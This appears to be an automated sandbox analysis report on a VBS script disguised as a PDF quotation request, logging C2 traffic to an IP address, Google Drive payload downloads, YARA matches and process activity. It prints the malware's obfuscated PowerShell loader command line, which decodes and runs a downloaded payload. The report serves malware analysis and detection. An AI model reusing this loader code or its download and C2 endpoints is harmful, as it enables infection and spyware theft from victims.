Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 153Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215
Source: unknown	TCP traffic detected without corresponding DNS query: 137.184.191.215

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa

Source: unknown

Source: dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://137.184.191.215/index.php/10899
Source: powershell.exe, 00000004.00000002.3052757147.00000000076E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B22A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B04F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3034052214.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B04F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.3034052214.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B21BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googPz
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B092B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B21BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: dxdiag.exe, 00000014.00000002.3346265000.0000000021150000.00000004.00001000.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f
Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_fd
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B0717000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRuP
Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRuXR
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googhh
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B0985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.0000000005FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: dxdiag.exe, 00000014.00000002.3335131309.0000000006024000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/S
Source: dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000600A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download
Source: dxdiag.exe, 00000014.00000002.3335131309.000000000600A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download2
Source: dxdiag.exe, 00000014.00000002.3335131309.000000000600A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=downloadd
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B0985000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1isLUzmFJ89mO5f9GlouoLyV7qEtwrtRu&export=download
Source: dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/earc%(
Source: dxdiag.exe, 00000014.00000003.2502961675.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000002.3335131309.000000000603C000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2476461410.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/s.cn
Source: powershell.exe, 00000004.00000002.3034052214.0000000004D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B10CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2221990774.000001F3C0564000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3047323826.0000000005C5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: dxdiag.exe, 00000014.00000002.3335131309.0000000005FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2192650353.000001F3B226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B0981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2192650353.000001F3B2295000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000014.00000003.2469493983.000000000603C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65312
Source: unknown	Network traffic detected: HTTP traffic on port 65310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:65310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.5:65312 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_1292.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Linnas Kandidtwr overskyet Ecdysial Hjlandene Providentialism Selekteringer #>;$Rystelses='Makeress';<#plungy Firdobling Preferrers Aftvingende Encoders Hardier Forsvarschefernes #>;$Hvsnings=$host.PrivateData;If ($Hvsnings) {$narrishkeit++;}function atomangreb($Antipapistical246){$Bondske=$Fremmeligst+$Antipapistical246.Length-$narrishkeit;for( $Halfheartednesses=5;$Halfheartednesses -lt $Bondske;$Halfheartednesses+=6){$minkfarven+=$Antipapistical246[$Halfheartednesses];}$minkfarven;}function rme($Stillehavsflaadernes){ . ($posthume) ($Stillehavsflaadernes);}$Gulvmaattens=atomangreb 'SpinaMb ugeoSade zSkyldiD.rivlTsarelPartea Hexi/ uror5Angin. Prod0A.tin Manom(skonnWmyoepibarsen MigodUnaudo SulfwSnv.es Lati Kons NBaan.TIniti Kldni1Regis0Bolig.Kirop0Opsam; Civi AntyW Pub iVir,lnWid.w6Rance4 igna;alene A,tabxReemk6Crabb4Speci;Handl IrettrAl,miv Budg:midda1Colpe2N dbr1Bombe. Hosl0Under)Ambit SubelGRenteeU eldcValthkMeethoHyper/In,ho2 Dune0 etnk1 List0 Medb0Nark 1Subef0Alder1 onr WicksFVaginiTwi.trB rguephanefSci,soEnga,xVandl/Gstel1 umsk2 Feri1Skaks.,inkl0 lge ';$librettoens=atomangreb ' alibU Tea,s CirceSui tRBegav- Geopa StorgInhomeIa.hinGarruTDisge ';$Broderierne=atomangreb 'DimplhAntietDistitGastepB,nussKrake:Ungdo/Funkt/Over.d B llr SelviAfd,ivR vieeAfkri.Drogsg RekloBidraoBe,vegIn.mulmarkseR,gnf.FigetcTuberoFamldm tang/.asteuBev.dcP eud?LammieWorkuxUdsk.pDunbaoTilm rRehant P lm=UnuandCaddioMaskiwkinemnVbnenlDelsao SnivaAtolldTegni&AlumriSm gsdBendi= Paal1 UriniIndtjs RecrL A acUDrapezM.dermSilenFdataiJLige 8Su co9 Dobbm knusOTo fl5ContofOrnam9IngenGLingul TomhoSko euZarisount,uL skdyyRefluVCanon7UdtmtqAdmetEMos itUnderw,avsprDividtFattiRTransuPalma ';$Udviskning=atomangreb 'stose>Nedfr ';$posthume=atomangreb 'BargiiMarkoE SkibX oso ';$Cassina='Kendetegner';$Dentine='\Smaalige.Eks';rme (atomangreb 'Rabat$Noncog Tap lNacroo enlsbE segapsychlStagn:AntisO oodvBo ene alkarForbecPsa ooGrundaM rcet Bire= Dy,t$ .ispeMedionvatikv orev:Tr chaPredapBarfop Scled FraiaMatert eskaaVigil+Bes,a$Dem eDB rmae AndrnSeawat oomsiSpi.nnProloeHa de ');rme (atomangreb ' Viva$PedotgDisselT rmkoSairlb PretaFlig.lClogg: KlasURemain Sregs uspet Hoveu agidSpa ei Op,eeReadodPerp.nSaddueAnke s,oextsKommu=Te,te$DriveB urmarT llgoKarnedBioloeVrlesrHeterinons e,athirOleosnInpute Succ.Illu.s Phy p Swi.lFusibiSerpetEkstr(A ous$Anti,UUnderdG udev,ndiui mprosUnshak OpmanOrga iTroopn J.ckgFarth)Staal ');rme (atomangreb ',arak[ KortNPneumeSo attSkovb.SkrmfSOverpeGarnerEnjoyvSlowmiBauxicU.eskeBrndePUndiso.ealiiFladfn Non tS,okiMPrvepaSquifnPortea GonogDemimeAfspnrOtten] Rip :fagbl: MainSF emmeKontrcBud ruLektir Knowi MldttTo nfyShantPver er KammoSymmet Vo doFl.decstratoStranlModpa Heter=Mini Brneb[drot N,erieeRaah t.umle.ForfrSFiloseMyretcStjfruUdlaarGar liBilbotSpilly tartPHock,rEpicloPapert S lioTagkacFrsteo Li,ilCoh,bT Yanoy aurepBeclaeTypec]Prize:Antnd			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D6B2F2	2_2_00007FF848D6B2F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D6C0A2	2_2_00007FF848D6C0A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848E3A09A	2_2_00007FF848E3A09A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0310F320	4_2_0310F320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0310FBF0	4_2_0310FBF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0310EFD8	4_2_0310EFD8

Java / VBScript file with very long strings (likely obfuscated code)

Source: Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs

Initial sample: Strings found which are bigger than 50

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6999
Source: unknown	Process created: Commandline size = 6999
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6999	Jump to behavior

Yara signature match

Source: amsi32_1292.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7156, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: powershell.exe, 00000004.00000002.3052757147.00000000076AB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBp

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@34/10@5/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Smaalige.Eks

Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tgk4xkj.rz5.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aj#U00e1nlatk#U00e9r#U00e9s 09-30-2024#U00b7pdf.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1292
Source: C:\Windows\SysWOW64\dxdiag.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7156

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

